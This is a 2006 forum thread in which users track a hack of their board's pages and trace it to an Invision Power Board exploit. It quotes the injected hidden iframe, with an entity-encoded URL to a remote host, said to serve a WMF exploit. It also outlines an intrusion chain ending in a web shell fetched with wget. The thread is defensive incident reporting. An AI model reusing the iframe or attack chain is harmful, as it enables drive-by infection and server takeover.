Obraxis Posted July 8, 2006 Share Posted July 8, 2006 Firefox is keeping me safe :) Link to comment Share on other sites More sharing options...
RaisinCain Posted July 8, 2006 Author Share Posted July 8, 2006 he prolly just was being a smartass like i was in my post :D :D :D :D :D :D :D Link to comment Share on other sites More sharing options...
Redmak Administrators Posted July 8, 2006 Administrators Share Posted July 8, 2006 And is it just the forums or also the main page? Link to comment Share on other sites More sharing options...
WastedJoker Posted July 8, 2006 Share Posted July 8, 2006 Soon as I opened Neowin in IE7 beta3. Link to comment Share on other sites More sharing options...
RaisinCain Posted July 8, 2006 Author Share Posted July 8, 2006 Just forums for me. Link to comment Share on other sites More sharing options...
iascoot Posted July 8, 2006 Share Posted July 8, 2006 its everypage (of the forums) redmark </head> <body> CODE IS HERE <div id="ipbwrapper"> <script type="text/javascript"> its right near the top, Link to comment Share on other sites More sharing options...
jamend Posted July 8, 2006 Share Posted July 8, 2006 And is it just the forums or also the main page? It's only the forums, not the main page. Anyways, the site should be taken offline until it's fixed, otherwise lots of people will be hacked. Also, and obviously, web pages don't just change themselves... Link to comment Share on other sites More sharing options...
callumy Posted July 8, 2006 Share Posted July 8, 2006 Lucky I am on my Mac! God this could be dangerous (I don't even have anti-virus for my non-internet connected laptop - I don't connect it to the internet so n most cases it doesn't matter). There isn't anything at http://zchxsikpgz.biz/. It is just the default Apache filler page! This is really bad. I hope it can be squashed soon. Cal Link to comment Share on other sites More sharing options...
accesser Posted July 8, 2006 Share Posted July 8, 2006 This is what I am getting with Vista and IE7 Link to comment Share on other sites More sharing options...
Si Veteran Posted July 8, 2006 Veteran Share Posted July 8, 2006 Threads merged Link to comment Share on other sites More sharing options...
da13ro Posted July 8, 2006 Share Posted July 8, 2006 Confirmed: just forums. Link to comment Share on other sites More sharing options...
Japlabot Posted July 8, 2006 Share Posted July 8, 2006 <iframe src=" 104; 116; 116; 112; 58; 47; 47; 122; 99; 104; 120; 115; 105; 107; 112; 103; 122; 46; 98; 105; 122; 47; 100; 108; 47; 97; 100; 118; 53; 52; 51; 46; 112; 104; 112;" width=1 height=1></iframe> When the HTML entities are decoded (" ;"), it is http://zchxsikpgz.biz/dl/adv543.php Didn't affect Firefox, had to fire up IE7 Beta 3 to see it, and NOD32 stopped it. Can anyone post a selection of the source because I don't see it Link to comment Share on other sites More sharing options...
zipgenius Posted July 8, 2006 Share Posted July 8, 2006 I can confirm: Invision Power Board has been hacked. That happened also tmy forum at http://forum.wininizio.it Useful notice for the admins: grep your server for the string "r57shell". The hacker that attacked our website used this perl script: http://www.milw0rm.com/exploits/1720 The script attacks IPB up to v 2.1.5 but it could be improved to attack 2.1.6 also. The perl script can be locally executed (you just need a Perl environment in your system): it adds a post with a user account specifically added to begin the attack; the script then adds a new post with strange characters and finally it enables a remote shell. The hacker that attacked us placed a WGET command to upload a web shell (r57shell.php) that gives full control over the server, so he was able to modify the index.php file of any web application he found on our server. Link to comment Share on other sites More sharing options...
iascoot Posted July 8, 2006 Share Posted July 8, 2006 its gone :D look at source Link to comment Share on other sites More sharing options...
accesser Posted July 8, 2006 Share Posted July 8, 2006 So what is this nasty trying to do anyway ? Link to comment Share on other sites More sharing options...
da13ro Posted July 8, 2006 Share Posted July 8, 2006 Excelent, next step :p Prevention hehe Nicely resolved Link to comment Share on other sites More sharing options...
John Veteran Posted July 8, 2006 Veteran Share Posted July 8, 2006 It's gone, but the exploit is still live. Invision needs to release a fix, or a workaround implimented before we can be sure it won't happen again. Link to comment Share on other sites More sharing options...
zipgenius Posted July 8, 2006 Share Posted July 8, 2006 So what is this nasty trying to do anyway ? That code tries to load a remote malfomed .WMF file in order to hit unpatched Windows system. Link to comment Share on other sites More sharing options...
84Mark Posted July 8, 2006 Share Posted July 8, 2006 Yup, fixed :D Link to comment Share on other sites More sharing options...
illicit Posted July 8, 2006 Share Posted July 8, 2006 Me too, NOD is going nuts Same over here. Link to comment Share on other sites More sharing options...
blackice912 Veteran Posted July 8, 2006 Veteran Share Posted July 8, 2006 its gone :D look at source Gone yes, but now to figure out how it got in there and tie any holes down. Link to comment Share on other sites More sharing options...
zipgenius Posted July 8, 2006 Share Posted July 8, 2006 I can confirm: Invision Power Board has been hacked.That happened also tmy forum at http://forum.wininizio.it Useful notice for the admins: grep your server for the string "r57shell". The hacker that attacked our website used this perl script: http://www.milw0rm.com/exploits/1720 The script attacks IPB up to v 2.1.5 but it could be improved to attack 2.1.6 also. The perl script can be locally executed (you just need a Perl environment in your system): it adds a post with a user account specifically added to begin the attack; the script then adds a new post with strange characters and finally it enables a remote shell. The hacker that attacked us placed a WGET command to upload a web shell (r57shell.php) that gives full control over the server, so he was able to modify the index.php file of any web application he found on our server. Additional info: this kind of attack uses the Invision folders that need to be chmod 0777 like /uploads or similar. Link to comment Share on other sites More sharing options...
84Mark Posted July 8, 2006 Share Posted July 8, 2006 I wonder if it actually "got" anyone. Link to comment Share on other sites More sharing options...
accesser Posted July 8, 2006 Share Posted July 8, 2006 That code tries to load a remote malfomed .WMF file in order to hit unpatched Windows system. Thanks (Y) Link to comment Share on other sites More sharing options...
zipgenius Posted July 8, 2006 Share Posted July 8, 2006 I wonder if it actually "got" anyone. I think that someone has been affected: not everybody has applied the WMF patch :( Link to comment Share on other sites More sharing options...
Recommended Posts